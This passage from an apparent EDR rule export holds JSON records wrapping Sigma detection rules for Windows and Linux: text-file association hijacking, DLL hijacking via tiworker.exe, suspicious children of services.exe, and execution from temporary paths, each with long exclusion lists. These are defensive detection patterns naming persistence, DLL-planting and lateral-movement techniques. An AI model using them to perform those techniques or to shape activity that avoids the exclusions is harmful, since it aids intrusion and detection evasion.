'?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_openwith:\n ProcessImage|endswith: '\\openwith.exe'\n ProcessSigned: 'true'\n 
ProcessSignature: 'Microsoft Windows'\n\n exclusion_notepad:\n TargetObject:\n - 'HKCR\\txtfile\\shell\\open\\command\\(Default)'\n - 'HKCR\\txtfile\\shell\\print\\command\\(Default)'\n - 'HKCR\\txtfile\\shell\\printto\\command\\(Default)'\n Details|contains:\n - '%SystemRoot%\\system32\\notepad.exe'\n - '?:\\Windows\\System32\\notepad.exe'\n\n exclusion_ivanti:\n ProcessImage|endswith: 'EPSecurityService.exe'\n ProcessSigned: 'true'\n ProcessSignature|contains: 'Bitdefender'\n\n exclusion_txt:\n TargetObject: 'HKCR\\.txt\\(Default)'\n Details:\n - 'ASC.Txt'\n - 'txt'\n - 'txtfile'\n - 'txtfilelegacy'\n - 'Notepad++_file'\n - 'Text File'\n - 'UltraEdit.txt'\n - 'StoneFax.Print.Utility.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "67d6a3a7-1abe-47fe-acb8-674865f2c31e",
"rule_name": "Default Text File Association Changed in Registry",
"rule_description": "Detects the modification of the default program to open a text file in the registry.\nAttackers may establish persistence by setting the default program to open a specific file type to a malicious executable.\nThis malicious executable is then started when a file presenting the extension is opened by a user.\nIt is recommended to investigate the value of the registry modification as well as the process performing the modification to determine the legitimacy of this action.\n",
"rule_creation_date": "2022-11-07",
"rule_modified_date": "2026-01-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1546.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "67db9973-8422-4d56-8bac-e2e8635979f9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096899Z",
"creation_date": "2026-03-23T11:45:34.096901Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096905Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.vonahi.io/srclient-dll-hijacking/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_tiworker.yml",
"content": "title: DLL Hijacking via tiworker.exe\nid: 67db9973-8422-4d56-8bac-e2e8635979f9\ndescription: |\n Detects potential Windows DLL Hijacking via tiworker.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://blog.vonahi.io/srclient-dll-hijacking/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'tiworker.exe'\n ImageLoaded|endswith: '\\srclient.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "67db9973-8422-4d56-8bac-e2e8635979f9",
"rule_name": "DLL Hijacking via tiworker.exe",
"rule_description": "Detects potential Windows DLL Hijacking via tiworker.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6805209d-4011-4732-a79a-ad1db5090d94",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094175Z",
"creation_date": "2026-03-23T11:45:34.094177Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094181Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1569/002/"
],
"name": "t1569_002_suspicious_service_binary.yml",
"content": "title: Suspicious Program Launched by services.exe\nid: 6805209d-4011-4732-a79a-ad1db5090d94\ndescription: |\n Detects suspicious programs being spawned by services.exe.\n Attackers may create services remotely to move laterally on a network; they can also abuse the Windows Service Control Manager to execute malicious commands or payloads.\n It is recommended to check the legitimacy of the executed binary or script as well as to investigate the user responsible for this action to look for other malicious actions.\nreferences:\n - https://attack.mitre.org/techniques/T1569/002/\ndate: 2020/11/13\nmodified: 2026/02/18\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1569.002\n - attack.t1059.001\n - attack.t1059.003\n - attack.t1059.005\n - attack.t1059.007\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.Exploitation\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_parent:\n ParentImage: '?:\\Windows\\System32\\services.exe'\n CurrentDirectory|startswith:\n - '?:\\windows\\'\n - '?:\\ProgramData\\'\n - '?:\\PerfLogs\\'\n - '?:\\temp\\'\n - '?:\\users\\'\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n - '?:\\\\?Recycle.Bin\\'\n\n selection_process:\n - Image|endswith:\n # cmd + scripts\n - '\\wscript.exe'\n - '\\cscript.exe'\n - '\\rundll32.exe' # maybe could lead to FP\n - '\\mshta.exe'\n - '\\pcalua.exe'\n # handle renamed binaries\n - OriginalFileName:\n - 'wscript.exe'\n - 'cscript.exe'\n - 'RUNDLL32.EXE'\n - 'MSHTA.EXE'\n # No OriginalFileName for pcalua.exe\n - Description: 'Program Compatibility Assistant'\n Company: 'Microsoft Corporation'\n\n select_process_cmd_generic:\n - Image|endswith: '\\cmd.exe'\n - OriginalFileName: 'Cmd.Exe'\n filter_process_cmd_generic:\n CommandLine|startswith:\n - '?:\\Windows\\SYSTEM32\\cmd.exe /c ?:\\'\n - '?:\\Windows\\SysWOW64\\cmd.exe /c ?:\\'\n\n 
select_process_cmd_specific:\n Image|endswith: '\\cmd.exe'\n CommandLine|contains:\n - '\\cmd.exe /c ?:\\windows\\'\n - '\\cmd.exe /c ?:\\ProgramData\\'\n - '\\cmd.exe /c ?:\\PerfLogs\\'\n - '\\cmd.exe /c ?:\\temp\\'\n - '\\cmd.exe /c ?:\\users\\'\n - '\\cmd.exe /c ?:\\\\?Recycle.Bin\\'\n - '\\cmd.exe /c \\\\\\\\*\\C$\\'\n - '\\cmd.exe /c \\\\\\\\*\\ADMIN$\\'\n\n select_process_powershell_generic:\n - Image|endswith:\n - '\\powershell.exe'\n - '\\pwsh.exe'\n - OriginalFileName:\n - 'PowerShell.EXE'\n - 'pwsh.dll' # related to pwsh.exe (PowerShell 6)\n filter_process_powershell_generic:\n CommandLine|startswith:\n - 'powershell.exe ?:\\'\n - 'powershell.exe *-File ?:\\'\n - 'powershell.exe *-Command ?:\\'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe ?:\\'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe *-File ?:\\'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe *-Command ?:\\'\n - '?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe ?:\\'\n - '?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe *-File ?:\\'\n - '?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe *-Command ?:\\'\n\n select_process_powershell_specific:\n Image|endswith:\n - '\\powershell.exe'\n - '\\pwsh.exe'\n CommandLine|contains:\n - 'powershell.exe ?:\\windows\\'\n - 'powershell.exe ?:\\ProgramData\\'\n - 'powershell.exe ?:\\PerfLogs\\'\n - 'powershell.exe ?:\\temp\\'\n - 'powershell.exe ?:\\users\\'\n - 'powershell.exe ?:\\\\?Recycle.Bin\\'\n - 'powershell.exe \\\\\\\\*\\C$\\'\n - 'powershell.exe \\\\\\\\*\\ADMIN$\\'\n - 'powershell.exe *-File ?:\\windows\\'\n - 'powershell.exe *-File ?:\\ProgramData\\'\n - 'powershell.exe *-File ?:\\PerfLogs\\'\n - 'powershell.exe *-File ?:\\temp\\'\n - 'powershell.exe *-File ?:\\users\\'\n - 'powershell.exe *-File ?:\\\\?Recycle.Bin\\'\n - 'powershell.exe *-File \\\\\\\\*\\C$\\'\n - 'powershell.exe *-File \\\\\\\\*\\ADMIN$\\'\n - 'powershell.exe *-Command 
?:\\windows\\'\n - 'powershell.exe *-Command ?:\\ProgramData\\'\n - 'powershell.exe *-Command ?:\\PerfLogs\\'\n - 'powershell.exe *-Command ?:\\temp\\'\n - 'powershell.exe *-Command ?:\\users\\'\n - 'powershell.exe *-Command ?:\\\\?Recycle.Bin\\'\n - 'powershell.exe *-Command \\\\\\\\*\\C$\\'\n - 'powershell.exe *-Command \\\\\\\\*\\ADMIN$\\'\n\n exclusion_commandline:\n CommandLine:\n - '*acproxy.dll,PerformAutochkOperations*' # C:\\Windows\\system32\\rundll32.exe /d acproxy.dll,PerformAutochkOperations\n - '*aepdu.dll,AePduRunUpdate*' # C:\\Windows\\system32\\rundll32.exe aepdu.dll,AePduRunUpdate\n - '*\\Windows\\system32\\silcollector.cmd*' # C:\\Windows\\system32\\cmd.exe /d /c C:\\Windows\\system32\\silcollector.cmd configure\n - '*srrstr.dll,ExecuteScheduledSPPCreation*' # C:\\Windows\\system32\\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation\n - '*ndfapi.dll,NdfRunDllDuplicateIPDefendingSystem*' # C:\\Windows\\system32\\rundll32.exe ndfapi.dll,NdfRunDllDuplicateIPDefendingSystem\n - '*Startupscan.dll,SusRunTask*' # C:\\Windows\\system32\\rundll32.exe Startupscan.dll,SusRunTask (parent is svchost -k netsvcs)\n - '*\\Windows\\system32\\pla.dll,PlaHost *' # C:\\Windows\\system32\\rundll32.exe C:\\Windows\\system32\\pla.dll,PlaHost \"Server Manager Performance Monitor\" \"$(Arg0)\"\n # C:\\Windows\\system32\\cscript.exe /B /nologo C:\\Windows\\system32\\calluxxprovider.vbs RemoveServerPerformanceLog Server Manager Performance Monitor 604800000 C:\\PerfLogs\\Admin\\ServerManager\\ $(Arg2)\n - '?:\\Windows\\system32\\cscript.exe /B /nologo ?:\\Windows\\system32\\calluxxprovider.vbs RemoveServerPerformanceLog Server Manager Performance Monitor *'\n - 'rundll32.exe WSClient.dll,RefreshBannedAppsList'\n - '*\\Windows\\system32\\calluxxprovider.vbs RemoveServerPerformanceLog \"Server Manager Performance Monitor\"*' # C:\\Windows\\system32\\cscript.exe /B /nologo C:\\Windows\\system32\\calluxxprovider.vbs RemoveServerPerformanceLog \"Server Manager Performance 
Monitor\" 604800000 C:\\PerfLogs\\Admin\\ServerManager\\ $(Arg2)\n - '*Windows.Storage.ApplicationData.dll,CleanupTemporaryState*' # C:\\Windows\\system32\\rundll32.exe Windows.Storage.ApplicationData.dll,CleanupTemporaryState\n - '?:\\windows\\system32\\rundll32.exe appraiser.dll,DoScheduledTelemetryRun'\n - '?:\\Windows\\system32\\rundll32.exe appraiser.dll,DailyGatedCheck'\n # C:\\windows\\system32\\rundll32.exe invagent.dll,RunUpdate\n # C:\\Windows\\system32\\rundll32.exe invagent.dll,RunUpdate -noappraiser\n - '?:\\Windows\\system32\\rundll32.exe invagent.dll,RunUpdate*'\n - 'rundll32.exe WSClient.dll,WSpTLR licensing'\n - '?:\\Windows\\system32\\rundll32.exe portabledeviceapi.dll,#1'\n - '?:\\Windows\\system32\\rundll32.exe dfdts.dll,DfdGetDefaultPolicyAndSMART'\n - 'cmd.exe /c %windir%\\nvcontainerrecovery.bat nvcontainerlocalsystem ?:\\programdata\\nvidia\\nvcontainerrecoverynvcontainerlocalsystem.log'\n - 'cmd.exe /C %windir%\\NvContainerRecovery.bat NVDisplay.ContainerLocalSystem ?:\\ProgramData\\NVIDIA\\NvContainerRecoveryNVDisplay.ContainerLocalSystem.log'\n - '?:\\Windows\\System32\\Rundll32.exe ?:\\Windows\\System32\\drivers\\\\*'\n - '?:\\Windows\\SYSTEM32\\cmd.exe /c ?:\\\\*\\Sauvegarde\\Scripts\\\\*'\n - '?:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -File ?:\\Program Files\\AzureConnectedMachineAgent\\azcmagent_check_updates.ps1'\n - 'cmd /c cd ?:\\Program Files\\Kerio\\Outlook Connector (Offline Edition)\\manticore && bin\\searchd.exe *'\n - 'cmd /c cd ?:\\Program Files (x86)\\Kerio\\Outlook Connector (Offline Edition)\\manticore && bin\\searchd.exe *'\n\n condition: selection_parent and\n (\n selection_process or\n (select_process_cmd_generic and not filter_process_cmd_generic) or\n select_process_cmd_specific or\n (select_process_powershell_generic and not filter_process_powershell_generic) or\n select_process_powershell_specific\n )\n and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6805209d-4011-4732-a79a-ad1db5090d94",
"rule_name": "Suspicious Program Launched by services.exe",
"rule_description": "Detects suspicious programs being spawned by services.exe.\nAttackers may create services remotely to move laterally on a network; they can also abuse the Windows Service Control Manager to execute malicious commands or payloads.\nIt is recommended to check the legitimacy of the executed binary or script as well as to investigate the user responsible for this action to look for other malicious actions.\n",
"rule_creation_date": "2020-11-13",
"rule_modified_date": "2026-02-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1059.003",
"attack.t1059.005",
"attack.t1059.007",
"attack.t1569.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "68166cf1-d62b-4f81-8545-0da8329719b3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620988Z",
"creation_date": "2026-03-23T11:45:34.620990Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620994Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md",
"https://attack.mitre.org/techniques/T1564/001/"
],
"name": "t1564_001_temporary_path_file_execution.yml",
"content": "title: Execution from Temporary Paths\nid: 68166cf1-d62b-4f81-8545-0da8329719b3\ndescription: |\n Detects a process execution from a temporary folder.\n Attackers may try to execute binaries in the temporary folder to evade detection and hide their traces, as temporary folders are cleaned upon reboot.\n It is recommended to determine if the executed binary is legitimate as well as to investigate the context of this execution.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md\n - https://attack.mitre.org/techniques/T1564/001/\ndate: 2021/09/27\nmodified: 2026/02/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.execution\n - attack.t1564.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.DefenseEvasion\n - classification.Linux.Behavior.Masquerading\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|startswith:\n - '/tmp/'\n - '/var/tmp/'\n\n filter_path:\n Image|startswith:\n - '/tmp/*/*/'\n - '/var/tmp/*/*/'\n\n # AppImage execution: /tmp/.mount_?????/\n # /tmp/.mount_cutter-18Af24/usr/bin/cutter\n # /tmp/.mount_drawioWquxf9/drawio\n # CommandLine exclusions for shell scripts launched from these paths\n exclusion_appimage:\n - Image|startswith:\n - '/tmp/.mount_*/'\n - '/var/tmp/.mount_*/'\n - CommandLine|startswith:\n - '/bin/sh /tmp/.mount_*/'\n - '/bin/sh /var/tmp/.mount_*/'\n - '/bin/zsh /tmp/.mount_*/'\n - '/bin/zsh /var/tmp/.mount_*/'\n # dash|bash, just in case.\n - '/bin/?ash /tmp/.mount_*/'\n - '/bin/?ash /var/tmp/.mount_*/'\n\n exclusion_dropbox:\n # /tmp/.dropbox-dist-new-614wdg_l/.dropbox-dist/dropbox-lnx.x86_64-148.4.4519/dropbox\n Image: '/tmp/.dropbox-dist-new-*/dropbox'\n\n exclusion_conftest:\n # /tmp/pip-install-qlnay9pg/pycrypto_cf2c3963f87a42fa9ae01a2405ae576e/conftest\n # /tmp/pip-install-YeTZDR/pycrypto/conftest\n # 
/tmp/pear/temp/pear-build-defaultuser6nb1BB/rdkafka-6.0.1/conftest\n # /tmp/pear/temp/pear-build-defaultuserTIhRtM/imagick-3.7.0/conftest\n # /tmp/pear/temp/pear-build-defaultusergQ5TEA/redis-5.3.7/conftest\n # /tmp/tomcat-native-1.2.32-src/native/conftest\n # /tmp/pip-install-6ysytxgr/dbus-python_e8dcbd6233e24e718efbafe3c38accac/build/temp.linux-x86_64-3.8/conftest\n # /tmp/pear/temp/pear-build-rooti8Yo5A/ssdeep-1.1.0/conftest\n # /tmp/Python-3.10.2/conftest\n # /tmp/icu/source/conftest\n # /tmp/libbson/conftest\n Image: '/tmp/*/conftest'\n CommandLine: './conftest'\n\n exclusion_sap:\n # /tmp/sapinst_exe.405249.1652192102/jre/bin/java\n # /tmp/sapinst_exe.1618399.1650889342/jre/bin/forkhelper\n # /tmp/sapinst_exe.405249.1652192102/sapinstexe\n # /tmp/sapinst_exe.490059.1652191158/sapwebdisp\n # /tmp/sapinst_exe.490059.1652191158/ProcessWatchdog\n # /tmp/sapinst_exe.405249.1652192102/SAPCAR\n # /tmp/sapinst_instdir/GENERIC/SMD/INST/SmdSapJvm/sapjvm_8/bin/java\n # /tmp/sapinst_instdir/GENERIC/SMD/INST/SmdSapJvm/sapjvm_8/jre/bin/forkhelper\n Image:\n - '/tmp/sapinst_exe.*/*'\n - '/tmp/sapinst_instdir/*'\n\n exclusion_oracle:\n # /tmp/CVU_19.0.0.0.0_oracle/exectask\n # /tmp/RU_Oracle/gateways/install/.oui\n # /tmp/OraInstall2022-05-09_10-56-48AM/jdk/jre/bin/java\n # /tmp/OraInstall2022-05-09_11-02-28AM/jdk/bin/java\n Image:\n - '/tmp/CVU_*_oracle/exectask'\n - '/tmp/CVU_*_resource/exectask'\n - '/tmp/RU_Oracle/gateways/install/.oui'\n - '/tmp/OraInstall*/jdk/jre/bin/java'\n - '/tmp/OraInstall*/jdk/bin/java'\n\n exclusion_vmwware:\n # /tmp/.SAPOSCOL_00000F1D_A60DE0EA.EXE\n # /tmp/.SAPOSCOL_00000F1D_3DA6DF5B.EXE\n Image: '/tmp/.SAPOSCOL_????????_????????.EXE'\n CommandLine: 'vmware_getdat -q'\n\n exclusion_install_dir:\n # /tmp/install.dir.84311/Linux/resource/jre/bin/forkhelper\n # /tmp/install.dir.84311/Linux/resource/jre/bin/java\n Image:\n - '/tmp/install.dir.*/Linux/resource/jre/bin/forkhelper'\n - '/tmp/install.dir.*/Linux/resource/jre/bin/java'\n\n 
exclusion_veeam:\n - Image|startswith:\n - '/tmp/veeamapp'\n - '/tmp/veeamagent'\n - ParentImage:\n - '/opt/veeam/veeampluginfororaclerman/veeamagent'\n - '/opt/veeam/veeampluginfororaclerman/rmanpluginmanager'\n - Ancestors|contains:\n - '|/opt/veeam/veeampluginfororaclerman/veeamagent|'\n - '|/opt/veeam/veeampluginfororaclerman/rmanpluginmanager|'\n\n exclusion_vmtoolsd:\n - ParentImage:\n - '/usr/bin/vmtoolsd'\n - '/usr/sbin/vmtoolsd'\n - GrandparentImage:\n - '/usr/bin/vmtoolsd'\n - '/usr/sbin/vmtoolsd'\n\n exclusion_rustdoc:\n Image: '/tmp/rustdoctest??????/rust_out'\n\n exclusion_go:\n # /tmp/go-build1480910053/b001/logsevents.test\n # /tmp/go-build3216331136/b001/schedulerd.test\n Image|startswith: '/tmp/go-build*/????/'\n\n exclusion_genesys:\n ParentCommandLine|contains: '/opt/install/genesys'\n GrandparentCommandLine|contains: '/opt/install/genesys'\n\n exclusion_netbackup:\n - CommandLine: '/tmp/par-????????/temp-?????/nbhealthchecker'\n # /usr/openv/netbackup/bin/nbhealthcheckcmd\n # /usr/openv/netbackup/bin/nbpas\n - ParentImage:\n - '/usr/openv/netbackup/bin/nbhealthcheckcmd'\n - '/usr/openv/netbackup/bin/nbpas'\n - GrandparentImage:\n - '/usr/openv/netbackup/bin/nbhealthcheckcmd'\n - '/usr/openv/netbackup/bin/nbpas'\n\n exclusion_buildah:\n Image|startswith:\n - '/var/tmp/buildah??????????/'\n - '/var/tmp/buildah?????????/'\n - '/tmp/buildah??????????/'\n\n exclusion_netbackup_bpcd:\n - Image: '/usr/openv/netbackup/bin/bpcd'\n - ParentImage: '/usr/openv/netbackup/bin/bpcd'\n - GrandparentImage: '/usr/openv/netbackup/bin/bpcd'\n\n exclusion_bladelogic:\n Image: '/tmp/scanlinux-x??'\n GrandparentImage: '/opt/bmc/bladelogic/RSCD/bin/rscd_full'\n\n exclusion_manageengine:\n ParentCommandLine: '/bin/sh ./ManageEngine_FirewallAnalyzer*.bin'\n\n exclusion_protoc:\n Image:\n - '/tmp/protoc??????????????????.exe'\n - '/tmp/protoc???????????????????.exe'\n\n exclusion_android_dev:\n # 
/tmp/-cache/jetbrains/remotedev/remote-dev-worker/remote-dev-worker_fcf8a611ab8f9110082dc5a71cb4e287dc9ee35120fb7880e4e56e6b92abec56\n # /tmp/-.gradle/caches/transforms-3/6cd239de5b1ec708bab6bb598b4f2db9/transformed/aapt2-7.4.0-8841542-linux/aapt2\n - Image:\n - '/tmp/*/jetbrains/remotedev/remote-dev-worker/remote-dev-worker_*'\n - '/tmp/*/sdk/platform-tools/adb'\n - '/tmp/*/sdk/emulator/crashpad_handler'\n - '/tmp/*/sdk/emulator/emulator-check'\n - '/tmp/*/sdk/emulator/emulator'\n - '/opt/android-studio-*/jbr/bin/java'\n - '/usr/local/android-studio-*/jbr/bin/java'\n - ParentImage:\n - '/opt/android-studio-*/jbr/bin/java'\n - '/usr/local/android-studio-*/jbr/bin/java'\n - GrandparentImage:\n - '/opt/android-studio-*/jbr/bin/java'\n - '/usr/local/android-studio-*/jbr/bin/java'\n\n exclusion_bitdefender:\n # /tmp/bdconfigure.XojjIr/bdconfigure64\n Image: '/tmp/bdconfigure.*/bdconfigure64'\n\n exclusion_mkrescue:\n # /var/tmp/rear.zhtfdmzmjmff79n/rootfs/bin/tty\n # /var/tmp/rear.ixgclpcvcimidyu/rootfs/bin/tty\n # /var/tmp/rear.ixgclpcvcimidyu/rootfs/usr/lib/ld-2.17.so\n # /var/tmp/rear.fohwn9pxrtmph4t/rootfs/bin/cat\n ProcessImage|startswith: '/var/tmp/rear.???????????????/rootfs/'\n\n exclusion_dbvisit:\n # /tmp/par-6f7261636c65/cache-b383cface1d28c890ef9b3d2e84c40dfa18b42ec/dbvctl\n # /tmp/par-6f7261636c65/cache-1735cb40c61060f403facf36dfecf7cfe5e34492/dbvctl\n ProcessImage:\n - '/tmp/par-????????????/cache-????????????????????????????????????????/dbvctl'\n - '/tmp/par-????????????/cache-????????????????????????????????????????/pandora_db'\n\n exclusion_opcon:\n ProcessImage|startswith: '/tmp/opcon_agent/'\n\n exclusion_plz_sandbox:\n ProcessImage|startswith: '/tmp/plz_sandbox/'\n\n exclusion_ollama:\n ProcessImage|startswith:\n - '/tmp/ollama/'\n - '/tmp/ollama*/runners/*/ollama_llama_server'\n\n # TODO: Add a `Ancestors|contains: /usr/bin/make` (and cmake) exclusion\n # since a lot of build-systems use /tmp for their tests.\n\n exclusion_vscode:\n 
Ancestors|contains:\n - '|/usr/share/code/code|'\n - '|/snap/code/??/usr/share/code/code|'\n - '|/snap/code/???/usr/share/code/code|'\n - '|/snap/code/????/usr/share/code/code|'\n - '|/snap/code/?????/usr/share/code/code|'\n - '|/usr/share/vscodium/vscodium|'\n\n exclusion_veeamapp:\n ProcessImage: '/tmp/VeeamApp_????????-????-????-????-????????????'\n\n exclusion_pandora_server:\n ProcessGrandparentCommandLine|startswith: '/usr/bin/pandora_server'\n ProcessImage|startswith: '/tmp/par-*/cache-*/'\n\n exclusion_convert:\n ProcessImage: '/tmp/wptoolsrtfconvert*'\n\n exclusion_gitaly:\n ProcessImage|startswith: '/tmp/gitaly-'\n\n exclusion_docker:\n ProcessAncestors|contains: '|/usr/bin/containerd-shim|'\n\n exclusion_terraform:\n ProcessParentImage: '/usr/bin/terraform'\n\n exclusion_coder:\n ProcessImage: '/tmp/coder.??????/coder'\n\n exclusion_sonarqube:\n ProcessImage|startswith: '/tmp/.sonar/cache'\n\n exclusion_sipp:\n ProcessImage|startswith: '/tmp/sipp/sippx86_64'\n\n exclusion_conda_pixi:\n ProcessImage: '/tmp/*/.CondaPkg/.pixi'\n\n exclusion_libertp:\n ProcessImage: '/tmp/ltpx_refchr/gettargetid64_linux'\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "68166cf1-d62b-4f81-8545-0da8329719b3",
"rule_name": "Execution from Temporary Paths",
"rule_description": "Detects a process execution from a temporary folder.\nAttackers may try to execute binaries in the temporary folder to evade detection and hide their traces, as temporary folders are cleaned upon reboot.\nIt is recommended to determine if the executed binary is legitimate as well as to investigate the context of this execution.\n",
"rule_creation_date": "2021-09-27",
"rule_modified_date": "2026-02-16",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1564.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6841ffbd-a5e2-4fea-a4f5-68d0a12bec53",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.590997Z",
"creation_date": "2026-03-23T11:45:34.591000Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.591007Z",
